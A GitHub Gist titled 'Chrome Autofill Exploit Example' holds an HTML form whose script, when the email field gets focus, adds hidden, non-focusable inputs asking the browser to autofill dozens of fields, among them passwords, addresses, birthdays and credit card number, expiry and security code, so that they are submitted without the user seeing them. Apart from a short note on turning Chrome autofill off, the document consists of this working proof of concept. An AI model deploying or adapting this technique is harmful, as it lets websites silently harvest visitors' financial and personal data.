Created
January 14, 2017 09:06
-
-
Save lacostenycoder/ef619fece24803a73289124b5ee59054 to your computer and use it in GitHub Desktop.
Chrome Autofill Exploit Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>Test Chrome Autofill Hack</title> | |
| </head> | |
| <style media="screen"> | |
| .hidden { | |
| /*display: none;*/ | |
| } | |
| </style> | |
| <body> | |
| <form action="/my-handling-form-page" method="post" id="form"> | |
| <div> | |
| <label for="name">Name:</label> | |
| <input type="text" id="name" name="user_name" /> | |
| </div> | |
| <div> | |
| <label for="mail">E-mail:</label> | |
| <input type="email" id="email" name="user_mail" /> | |
| </div> | |
| <div> | |
| <label for="msg">Message:</label> | |
| <textarea id="msg" name="user_message"></textarea> | |
| </div> | |
| <div class="button"> | |
| <button type="submit">Submit</button> | |
| </div> | |
| </form> | |
| </body> | |
| <script type="text/javascript"> | |
| var autocompletes = ['name', 'honorific-prefix', 'given-name', | |
| 'additional-name', 'family-name', 'honorific-suffix', | |
| 'nickname', 'username', 'new-password', | |
| 'current-password', 'organization-title', 'organization', | |
| 'street-address', 'address-line1', 'address-line2', | |
| 'address-line3', 'address-level4', 'address-level3', | |
| 'address-level2', 'address-level1', 'country', | |
| 'country-name', 'postal-code', 'cc-name', 'cc-given-name', | |
| 'cc-additional-name', 'cc-family-name', 'cc-exp', | |
| 'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type', | |
| 'transaction-currency', 'transaction-amount', | |
| 'language', 'bday', 'bday-day', 'bday-month', | |
| 'bday-year', 'sex', 'url', 'photo', 'tel', | |
| 'tel-country-code', 'tel-national', | |
| 'tel-area-code', 'tel-local', 'tel-local-prefix', | |
| 'tel-local-suffix', 'tel-extension', 'impp' | |
| ]; | |
| var emailField = document.getElementById('email'); | |
| var form = document.getElementById('form'); | |
| emailField.addEventListener('focus', function() { | |
| var wrap = autocompletes.reduce(function(wrapper, field) { | |
| var input = document.createElement('input'); | |
| // Make them not focussable | |
| input.tabIndex = -1; | |
| input.autocomplete = field; | |
| wrapper.appendChild(input); | |
| return wrapper; | |
| }, document.createElement('div')); | |
| // Hide the wrapper | |
| wrap.classList.add('hidden'); | |
| form.appendChild(wrap); | |
| // Inject the autocompletes once | |
| this.removeEventListener('focus', arguments.callee); | |
| }); | |
| </script> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Chrome's solution - disable autofill
Turn off Autofill
Open Chrome.
At the top right, click More Settings.
At the bottom, click Show advanced settings.
Under "Passwords and forms," uncheck "Enable Autofill to fill out web forms in a single click."